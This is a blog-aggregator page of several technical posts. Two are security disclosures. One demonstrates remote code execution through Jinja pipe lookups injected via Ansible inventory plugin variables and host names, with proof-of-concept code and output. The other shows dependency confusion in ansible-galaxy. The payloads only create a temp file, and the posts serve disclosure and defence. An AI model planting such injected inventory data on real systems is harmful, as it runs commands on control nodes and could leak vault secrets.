Search Results: "evgeni"

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

8 April 2023

Evgeni Golov: Running autopkgtest with Docker inside Docker

While I am not the biggest fan of Docker, I must admit it has quite some reach across various service providers and can often be seen as an API for running things in isolated environments. One such service provider is GitHub when it comes to their Actions service. I have no idea what isolation technology GitHub uses on the outside of Actions, but inside you just get an Ubuntu system and can run whatever you want via Docker as that comes pre-installed and pre-configured. This especially means you can run things inside vanilla Debian containers, that are free from any GitHub or Canonical modifications one might not want ;-) So, if you want to run, say, lintian from sid, you can define a job to do so:
  lintian:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run lintian on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends lintian
      - run: lintian --info --display-info *.changes
This will run on Ubuntu (latest right now means 22.04 for GitHub), but then use Docker to run the debian:sid container and execute all further steps inside it. Pretty short and straight forward, right? Now lintian does static analysis of the package, it doesn't need to install it. What if we want to run autopkgtest that performs tests on an actually installed package? autopkgtest comes with various "virt servers", which are providing isolation of the testbed, so that it does not interfere with the host system. The simplest available virt server, autopkgtest-virt-null doesn't actually provide any isolation, as it runs things directly on the host system. This might seem fine when executed inside an ephemeral container in an CI environment, but it also means that multiple tests have the potential to influence each other as there is no way to revert the testbed to a clean state. For that, there are other, "real", virt servers available: chroot, lxc, qemu, docker and many more. They all have one in common: to use them, one needs to somehow provide an "image" (a prepared chroot, a tarball of a chroot, a vm disk, a container, , you get it) to operate on and most either bring a tool to create such an "image" or rely on a "registry" (online repository) to provide them. Most users of autopkgtest on GitHub (that I could find with their terrible search) are using either the null or the lxd virt servers. Probably because these are dead simple to set up (null) or the most "native" (lxd) in the Ubuntu environment. As I wanted to execute multiple tests that for sure would interfere with each other, the null virt server was out of the discussion pretty quickly. The lxd one also felt odd, as that meant I'd need to set up lxd (can be done in a few commands, but still) and it would need to download stuff from Canonical, incurring costs (which I couldn't care less about) and taking time which I do care about!). Enter autopkgtest-virt-docker, which recently was added to autopkgtest! No need to set things up, as GitHub already did all the Docker setup for me, and almost no waiting time to download the containers, as GitHub does heavy caching of stuff coming from Docker Hub (or at least it feels like that). The only drawback? It was added in autopkgtest 5.23, which Ubuntu 22.04 doesn't have. "We need to go deeper" and run autopkgtest from a sid container! With this idea, our current job definition would look like this:
  autopkgtest:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run autopkgtest on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends autopkgtest autodep8 docker.io
      - run: autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
(--setup-commands="apt-get update" is needed as the container comes with an empty apt cache and wouldn't be able to find dependencies of the tested package) However, this will fail:
# autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
autopkgtest [10:20:54]: starting date and time: 2023-04-07 10:20:54+0000
autopkgtest [10:20:54]: version 5.28
autopkgtest [10:20:54]: host a82a11789c0d; command line:
  /usr/bin/autopkgtest bley_2.0.0-1_amd64.changes '--setup-commands=apt-get update' -- docker debian:sid
Unexpected error:
Traceback (most recent call last):
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 829, in mainloop
    command()
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 758, in command
    r = f(c, ce)
        ^^^^^^^^
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 692, in cmd_copydown
    copyupdown(c, ce, False)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 580, in copyupdown
    copyupdown_internal(ce[0], c[1:], upp)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 607, in copyupdown_internal
    copydown_shareddir(sd[0], sd[1], dirsp, downtmp_host)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 562, in copydown_shareddir
    shutil.copy(host, host_tmp)
  File "/usr/lib/python3.11/shutil.py", line 419, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.11/shutil.py", line 258, in copyfile
    with open(dst, 'wb') as fdst:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/autopkgtest-virt-docker.shared.kn7n9ioe/downtmp/wrapper.sh'
autopkgtest [10:21:07]: ERROR: testbed failure: unexpected eof from the testbed
Running the same thing locally of course works, so there has to be something special about the setup at GitHub. But what?! A bit of digging revealed that autopkgtest-virt-docker tries to use a shared directory (using Dockers --volume) to exchange things with the testbed (for the downtmp-host capability). As my autopkgtest is running inside a container itself, nothing it tells the Docker deamon to mount will be actually visible to it. In retrospect this makes total sense and autopkgtest-virt-docker has a switch to "fix" the issue: --remote as the Docker deamon is technically remote when viewed from the place autopkgtest runs at. I'd argue this is not a bug in autopkgtest(-virt-docker), as the situation is actually cared for. There is even some auto-detection of "remote" daemons in the code, but that doesn't "know" how to detect the case where the daemon socket is mounted (vs being set as an environment variable). I've opened an MR (assume remote docker when running inside docker) which should detect the case of running inside a Docker container which kind of implies the daemon is remote. Not sure the patch will be accepted (it is a band-aid after all), but in the meantime I am quite happy with using --remote and so could you ;-)

7 December 2021

Evgeni Golov: The Mocking will continue, until CI improves

One might think, this blog is exclusively about weird language behavior and yelling at computers Well, welcome to another episode of Jackass! Today's opponent is Ruby, or maybe minitest , or maybe Mocha. I'm not exactly sure, but it was a rather amusing exercise and I like to share my nightmares ;) It all started with the classical "you're using old and unmaintained software, please switch to something new". The first attempt was to switch from the ci_reporter_minitest plugin to the minitest-ci plugin. While the change worked great for Foreman itself, it broke the reporting in Katello - the tests would run but no junit.xml was generated and Jenkins rightfully complained that it got no test results. While investigating what the hell was wrong, we realized that Katello was already using a minitest reporting plugin: minitest-reporters. Loading two different reporting plugins seemed like a good source for problems, so I tried using the same plugin for Foreman too. Guess what? After a bit of massaging (mostly to disable the second minitest-reporters initialization in Katello) reporting of test results from Katello started to work like a charm. But now the Foreman tests started to fail. Not fail to report, fail to actually run. WTH The failure was quite interesting too:
test/unit/parameter_filter_test.rb:5:in  block in <class:ParameterFilterTest>':
  Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
Yes, this is a single test file failing, all others were fine. The failing code doesn't look problematic on first glance:
require 'test_helper'
class ParameterFilterTest < ActiveSupport::TestCase
  let(:klass) do
    mock('Example').tap do  k 
      k.stubs(:name).returns('Example')
    end
  end
  test 'something' do
    something
  end
end
The failing line (5) is mock('Example').tap and for some reason Mocha thinks it's not initialized here. This certainly has something to do with how the various reporting plugins inject themselves, but I really didn't want to debug how to run two reporting plugins in parallel (which, as you remember, didn't expose this behavior). So the only real path forward was to debug what's happening here. Calling the test on its own, with one of the working reporter was the first step:
$ bundle exec rake test TEST=test/unit/parameter_filter_test.rb TESTOPTS=-v
 
#<Mocha::Mock:0x0000557bf1f22e30>#test_0001_permits plugin-added attribute = 0.04 s = .
#<Mocha::Mock:0x0000557bf12cf750>#test_0002_permits plugin-added attributes from blocks = 0.49 s = .
 
Wait, what? #<Mocha::Mock: >? Shouldn't this read more like ParameterFilterTest:: as it happens for every single other test in our test suite? It definitely should! That's actually great, as it tells us that there is really something wrong with the test and the change of the reporting plugin just makes it worse. What comes next is sheer luck. Well, that, and years of experience in yelling at computers. We use let(:klass) to define an object called klass and this object is a Mocha::Mock that we'll use in our tests later. Now klass is a very common term in Ruby when talking about classes and needing to store them mostly because one can't use class which is a keyword. Is something else in the stack using klass and our let is overriding that, making this whole thing explode? It was! The moment we replaced klass with klass1 (silly, I know, but there also was a klass2 in that code, so it did fit), things started to work nicely. I really liked Tomer's comment in the PR: "no idea why, but I am not going to dig into mocha to figure that out." Turns out, I couldn't let (HAH!) the code rest and really wanted to understand what happened there. What I didn't want to do is to debug the whole Foreman test stack, because it is massive. So I started to write a minimal reproducer for the issue. All starts with a Gemfile, as we need a few dependencies:
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Then a Rakefile:
require 'rake/testtask'
Rake::TestTask.new(:test) do  t 
  t.libs << 'test'
  t.test_files = FileList["test/**/*_test.rb"]
end
task :default => :test
And a test! I took the liberty to replace ActiveSupport::TestCase with Minitest::Test, as the test won't be using any Rails features and I wanted to keep my environment minimal.
require 'minitest/autorun'
require 'minitest/spec'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  extend Minitest::Spec::DSL
  let(:klass) do
    mock('Example').tap do  k 
      k.stubs(:name).returns('Example')
    end
  end
  def test_lol
    assert klass
  end
end
Well, damn, this passed! Is it Rails after all that breaks stuff? Let's add it to the Gemfile!
$ vim Gemfile
$ bundle install
$ bundle exec rake test TESTOPTS=-v
 
#<Mocha::Mock:0x0000564bbfe17e98>#test_lol = 0.00 s = .
Wait, I didn't change anything and it's already failing?! Fuck! I mean, cool! But the test isn't minimal yet. What can we reduce? let is just a fancy, lazy def, right? So instead of let(:klass) we should be able to write def class and achieve a similar outcome and drop that Minitest::Spec.
require 'minitest/autorun'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  def klass
    mock
  end
  def test_lol
    assert klass
  end
end
$ bundle exec rake test TESTOPTS=-v
 
/home/evgeni/Devel/minitest-wtf/test/parameter_filter_test.rb:5:in  klass': Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:68:in  format_line'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:15:in  record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:682:in  block in record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in  each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in  record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:324:in  run_one_method'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:311:in  block (2 levels) in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in  each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in  block in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:350:in  on_signal'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:337:in  with_info_handler'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:309:in  run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  block in __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  map'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in  __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:136:in  run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:63:in  block in autorun'
rake aborted!
Oh nice, this is even better! Instead of the mangled class name, we now get the very same error the Foreman tests aborted with, plus a nice stack trace! But wait, why is it pointing at railties? We're not loading that! Anyways, lets look at railties-6.1.4.1/lib/rails/test_unit/reporter.rb, line 68
def format_line(result)
  klass = result.respond_to?(:klass) ? result.klass : result.class
  "%s#%s = %.2f s = %s" % [klass, result.name, result.time, result.result_code]
end
Heh, this is touching result.klass, which we just messed up. Nice! But quickly back to railties What if we only add that to the Gemfile, not full blown Rails?
gem 'railties'
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Yepp, same failure. Also happens with require => false added to the line, so it seems railties somehow injects itself into rake even if nothing is using it?! "Cool"! By the way, why are we still pinning minitest to < 5.11? Oh right, this was the original reason to look into that whole topic. And, uh, it's pointing at klass there already! 4 years ago! So lets remove that boundary and funny enough, now tests are passing again, even if we use klass! Minitest 5.11 changed how Minitest::Test is structured, and seems not to rely on klass at that point anymore. And I guess Rails also changed a bit since the original pin was put in place four years ago. I didn't want to go another rabbit hole, finding out what changed in Rails, but I did try with 5.0 (well, 5.0.7.2) to be precise, and the output with newer (>= 5.11) Minitest was interesting:
$ bundle exec rake test TESTOPTS=-v
 
Minitest::Result#test_lol = 0.00 s = .
It's leaking Minitest::Result as klass now, instead of Mocha::Mock. So probably something along these lines was broken 4 years ago and triggered this pin. What do we learn from that?
  • klass is cursed and shouldn't be used in places where inheritance and tooling might decide to use it for some reason
  • inheritance is cursed - why the heck are implementation details of Minitest leaking inside my tests?!
  • tooling is cursed - why is railties injecting stuff when I didn't ask it to?!
  • dependency pinning is cursed - at least if you pin to avoid an issue and then forget about said issue for four years
  • I like cursed things!

3 December 2021

Evgeni Golov: Dependency confusion in the Ansible Galaxy CLI

I hope you enjoyed my last post about Ansible Galaxy Namespaces. In there I noted that I originally looked for something completely different and the namespace takeover was rather accidental. Well, originally I was looking at how the different Ansible content hosting services and their client (ansible-galaxy) behave in regard to clashes in naming of the hosted content. "Ansible content hosting services"?! There are currently three main ways for users to obtain Ansible content:
  • Ansible Galaxy - the original, community oriented, free hosting platform
  • Automation Hub - the place for Red Hat certified and supported content, available only with a Red Hat subscription, hosted by Red Hat
  • Ansible Automation Platform - the on-premise version of Automation Hub, syncs content from there and allows customers to upload own content
Now the question I was curious about was: how would the tooling behave if different sources would offer identically named content? This was inspired by Alex Birsan: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies and zofrex: Bundler is Still Vulnerable to Dependency Confusion Attacks (CVE - 2020 - 36327), who showed that the tooling for Python, Node.js and Ruby can be tricked into fetching content from "the wrong source", thus allowing an attacker to inject malicious code into a deployment. For the rest of this article, it's not important that there are different implementations of the hosting services, only that users can configure and use multiple sources at the same time. The problem is that, if the user configures their server_list to contain multiple Galaxy-compatible servers, like Ansible Galaxy and Automation Hub, and then asks to install a collection, the Ansible Galaxy CLI will ask every server in the list, until one returns a successful result. The exact order seems to differ between versions, but this doesn't really matter for the issue at hand. Imagine someone wants to install the redhat.satellite collection from Automation Hub (using ansible-galaxy collection install redhat.satellite). Now if their configuration defines Galaxy as the first, and Automation Hub as the second server, Galaxy is always asked whether it has redhat.satellite and only if the answer is negative, Automation Hub is asked. Today there is no redhat namespace on Galaxy, but there is a redhat user on GitHub, so The canonical answer to this issue is to use a requirements.yml file and setting the source parameter. This parameter allows you to express "regardless which sources are configured, please fetch this collection from here". That's is nice, but I think this not being the default syntax (contrary to what e.g. Bundler does) is a bad approach. Users might overlook the security implications, as the shorter syntax without the source just "magically" works. However, I think this is not even the main problem here. The documentation says: Once a collection is found, any of its requirements are only searched within the same Galaxy instance as the parent collection. The install process will not search for a collection requirement in a different Galaxy instance. But as it turns out, the source behavior was changed and now only applies to the exact collection it is set for, not for any dependencies this collection might have. For the sake of the example, imagine two collections: evgeni.test1 and evgeni.test2, where test2 declares a dependency on test1 in its galaxy.yml. Actually, no need to imagine, both collections are available in version 1.0.0 from galaxy.ansible.com and test1 version 2.0.0 is available from galaxy-dev.ansible.com. Now, given our recent reading of the docs, we craft the following requirements.yml:
collections:
- name: evgeni.test2
  version: '*'
  source: https://galaxy.ansible.com
In a perfect world, following the documentation, this would mean that both collections are fetched from galaxy.ansible.com, right? However, this is not what ansible-galaxy does. It will fetch evgeni.test2 from the specified source, determine it has a dependency on evgeni.test1 and fetch that from the "first" available source from the configuration. Take for example the following ansible.cfg:
[galaxy]
server_list = test_galaxy, release_galaxy, test_galaxy
[galaxy_server.release_galaxy]
url=https://galaxy.ansible.com/
[galaxy_server.test_galaxy]
url=https://galaxy-dev.ansible.com/
And try to install collections, using the above requirements.yml:
% ansible-galaxy collection install -r requirements.yml -vvv                 
ansible-galaxy 2.9.27
  config file = /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg
  configured module search path = ['/home/evgeni/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.10/site-packages/ansible
  executable location = /usr/bin/ansible-galaxy
  python version = 3.10.0 (default, Oct  4 2021, 00:00:00) [GCC 11.2.1 20210728 (Red Hat 11.2.1-1)]
Using /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg as config file
Reading requirement file at '/home/evgeni/Devel/ansible-wtf/collections/requirements.yml'
Found installed collection theforeman.foreman:3.0.0 at '/home/evgeni/.ansible/collections/ansible_collections/theforeman/foreman'
Process install dependency map
Processing requirement collection 'evgeni.test2'
Collection 'evgeni.test2' obtained from server explicit_requirement_evgeni.test2 https://galaxy.ansible.com/api/
Opened /home/evgeni/.ansible/galaxy_token
Processing requirement collection 'evgeni.test1' - as dependency of evgeni.test2
Collection 'evgeni.test1' obtained from server test_galaxy https://galaxy-dev.ansible.com/api
Starting collection install process
Installing 'evgeni.test2:1.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test2'
Downloading https://galaxy.ansible.com/download/evgeni-test2-1.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
Installing 'evgeni.test1:2.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test1'
Downloading https://galaxy-dev.ansible.com/download/evgeni-test1-2.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
As you can see, evgeni.test1 is fetched from galaxy-dev.ansible.com, instead of galaxy.ansible.com. Now, if those servers instead would be Galaxy and Automation Hub, and somebody managed to snag the redhat namespace on Galaxy, I would be now getting the wrong stuff Another problematic setup would be with Galaxy and on-prem Ansible Automation Platform, as you can have any namespace on the later and these most certainly can clash with namespaces on public Galaxy. I have reported this behavior to Ansible Security on 2021-08-26, giving a 90 days disclosure deadline, which expired on 2021-11-24. So far, the response was that this is working as designed, to allow cross-source dependencies (e.g. a private collection referring to one on Galaxy) and there is an issue to update the docs to match the code. If users want to explicitly pin sources, they are supposed to name all dependencies and their sources in requirements.yml. Alternatively they obviously can configure only one source in the configuration and always mirror all dependencies. I am not happy with this and I think this is terrible UX, explicitly inviting people to make mistakes.

2 December 2021

Jonathan McDowell: Building a desktop to improve my work/life balance

ASRock DeskMini X300 It s been over 20 months since the first COVID lockdown kicked in here in Northern Ireland and I started working from home. Even when the strict lockdown was lifted the advice here has continued to be If you can work from home you should work from home . I ve been into the office here and there (for new starts given you need to hand over a laptop and sort out some login details it s generally easier to do so in person, and I ve had a couple of whiteboard sessions that needed the high bandwidth face to face communication), but day to day is all from home. Early on I commented that work had taken over my study. This has largely continued to be true. I set my work laptop on the stand on a Monday morning and it sits there until Friday evening, when it gets switched for the personal laptop. I have a lovely LG 34UM88 21:9 Ultrawide monitor, and my laptops are small and light so I much prefer to use them docked. Also my general working pattern is to have a lot of external connections up and running (build machine, test devices, log host) which means a suspend/resume cycle disrupts things. So I like to minimise moving things about. I spent a little bit of time trying to find a dual laptop stand so I could have both machines setup and switch between them easily, but I didn t find anything that didn t seem to be geared up for DJs with a mixer + laptop combo taking up quite a bit of desk space rather than stacking laptops vertically. Eventually I realised that the right move was probably a desktop machine. Now, I haven t had a desktop machine since before I moved to the US, realising at the time that having everything on my laptop was much more convenient. I decided I didn t want something too big and noisy. Cheap GPUs seem hard to get hold of these days - I m not a gamer so all I need is something that can drive a ~ 4K monitor reliably enough. Looking around the AMD Ryzen 7 5700G seemed to be a decent CPU with one of the better integrated GPUs. I spent some time looking for a reasonable Mini-ITX case + motherboard and then I happened upon the ASRock DeskMini X300. This turns out to be perfect; I ve no need for a PCIe slot or anything more than an m.2 SSD. I paired it with a Noctua NH-L9a-AM4 heatsink + fan (same as I use in the house server), 32GB DDR4 and a 1TB WD SN550 NVMe SSD. Total cost just under 650 inc VAT + delivery (and that s a story for another post). A desktop solves the problem of fitting both machines on the desk at once, but there s still the question of smoothly switching between them. I read Evgeni Golov s article on a simple KVM switch for 30. My monitor has multiple inputs, so that s sorted. I did have a cheap USB2 switch (all I need for the keyboard/trackball) but it turned out to be pretty unreliable at the host detecting the USB change. I bought a UGREEN USB 3.0 Sharing Switch Box instead and it s turned out to be pretty reliable. The problem is that the LG 32UM88 turns out to have a poor DDC implementation, so while I can flip the keyboard easily with the UGREEN box I also have to manually select the monitor input. Which is a bit annoying, but not terrible. The important question is whether this has helped. I built all this at the end of October, so I ve had a month to play with it. Turns out I should have done it at some point last year. At the end of the day instead of either sitting at work for a bit longer, or completely avoiding the study, I m able to lock the work machine and flick to my personal setup. Even sitting in the same seat that disconnect , and the knowledge I won t see work Slack messages or emails come in and feeling I should respond, really helps. It also means I have access to my personal setup during the week without incurring a hit at the start of the working day when I have to set things up again. So it s much easier to just dip in to some personal tech stuff in the evening than it was previously. Also from the point of view I don t need to setup the personal config, I can pick up where I left off. All of which is really nice. It s also got me thinking about other minor improvements I should make to my home working environment to try and improve things. One obvious thing now the winter is here again is to improve my lighting; I have a good overhead LED panel but it s terribly positioned for video calls, being just behind me. So I think I m looking some sort of strip light I can have behind the large monitor to give a decent degree of backlight (possibly bouncing off the white wall). Lots of cheap options I m not convinced about, and I ve had a few ridiculously priced options from photographer friends; suggestions welcome.

29 November 2021

Evgeni Golov: Getting access to somebody else's Ansible Galaxy namespace

TL;DR: adding features after the fact is hard, normalizing names is hard, it's patched, carry on. I promise, the longer version is more interesting and fun to read! Recently, I was poking around Ansible Galaxy and almost accidentally got access to someone else's namespace. I was actually looking for something completely different, but accidental finds are the best ones! If you're asking yourself: "what the heck is he talking about?!", let's slow down for a moment:
  • Ansible is a great automation engine built around the concept of modules that do things (mostly written in Python) and playbooks (mostly written in YAML) that tell which things to do
  • Ansible Galaxy is a place where people can share their playbooks and modules for others to reuse
  • Galaxy Namespaces are a way to allow users to distinguish who published what and reduce name clashes to a minimum
